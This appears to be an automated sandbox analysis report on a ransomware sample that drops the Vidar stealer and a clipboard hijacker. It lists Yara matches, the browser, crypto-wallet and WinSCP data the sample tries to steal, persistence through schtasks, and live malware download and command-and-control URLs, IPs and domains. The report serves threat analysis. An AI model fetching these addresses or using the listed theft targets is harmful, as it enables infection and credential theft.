Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00403341 GetModuleHandleW,GetNamedPipeHandleStateW,InterlockedExchange,GetConsoleAliasExesLengthW,EnumCalendarInfoW,InterlockedCompareExchange,GetConsoleTitleA,GetLogicalDriveStringsW,FlushFileBuffers,GetShortPathNameA,GetComputerNameExA,CopyFileW,CloseHandle,LoadLibraryA,InterlockedIncrement,InterlockedIncrement,GetCharWidthA,CreateNamedPipeW,WinHttpSetOption,GlobalFlags,FindFirstVolumeA,CreateJobObjectA,GetModuleHandleW,FindResourceA,GetHandleInformation,CancelTimerQueueTimer,VerifyVersionInfoA,InterlockedIncrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetCPInfoExW,GetBinaryTypeA, 0_2_00403341
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_0040303E BuildCommDCBAndTimeoutsA,CreateMailslotA,GetDriveTypeA,GetCurrentDirectoryW,CallNamedPipeW,MoveFileExW,SearchPathA,GetVersionExA,OpenWaitableTimerA,FindNextVolumeMountPointW,FindNextVolumeMountPointW,ReadConsoleInputA,GetLogicalDriveStringsA,CreateDirectoryExW,FindNextVolumeMountPointW,GlobalLock,GetModuleHandleA,GetWindowsDirectoryW,SetMailslotInfo,CreateFileW,AddConsoleAliasW,IsProcessInJob,GetProcessPriorityBoost,EnumCalendarInfoExA,QueryDosDeviceW,GetConsoleTitleA,FillConsoleOutputAttribute,SetVolumeLabelA,CompareStringW, 0_2_0040303E

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 5.3.U59WtZz2Sg.exe.3060000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.362157229.0000000003060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED
Yara detected Vidar stealer
Source: Yara match File source: 10.0.build2.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.build2.exe.20d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.build2.exe.20d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.347600742.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.350956103.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.369240104.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.347031103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.347942903.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.347322735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???X
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Yara detected Credential Stealer
Source: Yara match File source: 0000000A.00000000.378213612.0000000000627000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Vidar stealer
Source: Yara match File source: 10.0.build2.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.build2.exe.20d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.build2.exe.20d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.build2.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.347600742.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.350956103.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.369240104.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.347031103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.347942903.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.347322735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 756302 Sample: U59WtZz2Sg.exe Startdate: 30/11/2022 Architecture: WINDOWS Score: 100 86 Snort IDS alert for network traffic 2->86 88 Multi AV Scanner detection for domain / URL 2->88 90 Malicious sample detected (through community Yara rule) 2->90 92 10 other signatures 2->92 11 U59WtZz2Sg.exe 2->11         started        14 U59WtZz2Sg.exe 2->14         started        16 U59WtZz2Sg.exe 2->16         started        18 2 other processes 2->18 process3 signatures4 102 Writes a notice file (html or txt) to demand a ransom 11->102 104 Writes many files with high entropy 11->104 106 Injects a PE file into a foreign processes 11->106 20 U59WtZz2Sg.exe 1 18 11->20         started        24 U59WtZz2Sg.exe 14->24         started        26 WMIADAP.exe 14->26         started        28 U59WtZz2Sg.exe 13 16->28         started        108 Multi AV Scanner detection for dropped file 18->108 30 U59WtZz2Sg.exe 18->30         started        32 schtasks.exe 18->32         started        process5 dnsIp6 74 api.2ip.ua 162.0.217.254, 443, 49702, 49703 ACPCA Canada 20->74 62 C:\Users\...\U59WtZz2Sg.exe:Zone.Identifier, ASCII 20->62 dropped 64 C:\Users\user\AppData\...\U59WtZz2Sg.exe, MS-DOS 20->64 dropped 34 U59WtZz2Sg.exe 20->34         started        37 icacls.exe 20->37         started        39 conhost.exe 32->39         started        file7 process8 signatures9 94 Injects a PE file into a foreign processes 34->94 41 U59WtZz2Sg.exe 1 25 34->41         started        process10 dnsIp11 80 fresherlights.com 222.236.49.123, 49704, 49706, 80 SKB-ASSKBroadbandCoLtdKR Korea Republic of 41->80 82 uaery.top 116.121.62.237, 49705, 80 CJNET-ASCheiljedangCoIncKR Korea Republic of 41->82 84 api.2ip.ua 41->84 66 C:\Users\user\...\UPPS.bin.uyro (copy), PDP-11 41->66 dropped 68 C:\Users\user\AppData\Local\...\UPPS.bin, PDP-11 41->68 dropped 70 C:\Users\user\AppData\Local\...\build3[1].exe, PE32 41->70 dropped 72 312 other files (214 malicious) 41->72 dropped 110 Modifies existing user documents (likely ransomware behavior) 41->110 46 build2.exe 41->46         started        49 build3.exe 41->49         started        file12 signatures13 process14 file15 112 Injects a PE file into a foreign processes 46->112 52 build2.exe 46->52         started        60 C:\Users\user\AppData\Roaming\...\mstsca.exe, PE32 49->60 dropped 114 Uses schtasks.exe or at.exe to add and modify task schedules 49->114 56 schtasks.exe 49->56         started        signatures16 process17 dnsIp18 76 t.me 149.154.167.99, 443, 49707 TELEGRAMRU United Kingdom 52->76 78 88.198.94.71, 49710, 80 HETZNER-ASDE Germany 52->78 96 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 52->96 98 Tries to harvest and steal browser information (history, passwords, etc) 52->98 100 Tries to steal Crypto Currency Wallets 52->100 58 conhost.exe 56->58         started        signatures19 process20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
116.121.62.237
 uaery.top Korea Republic of
9578 CJNET-ASCheiljedangCoIncKR true
88.198.94.71
 unknown Germany
24940 HETZNER-ASDE false
162.0.217.254
 api.2ip.ua Canada
35893 ACPCA false
222.236.49.123
 fresherlights.com Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU false

Contacted Domains

Name IP Active
uaery.top 116.121.62.237 true
fresherlights.com 222.236.49.123 true
t.me 149.154.167.99 true
api.2ip.ua 162.0.217.254 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://t.me/asifrazatg false
    		high
    http://uaery.top/dl/build2.exe true
    • Avira URL Cloud: malware
    		 unknown
    http://88.198.94.71/176356074953.zip false
    • Avira URL Cloud: safe
    		 unknown
    http://fresherlights.com/test1/get.php true
    • Avira URL Cloud: malware
    		 unknown
    http://88.198.94.71/ false
    • Avira URL Cloud: safe
    		 unknown
    http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true true
    • Avira URL Cloud: malware
    		 unknown
    http://88.198.94.71/517 false
    • Avira URL Cloud: safe
    		 unknown
    https://api.2ip.ua/geo.json false
      		high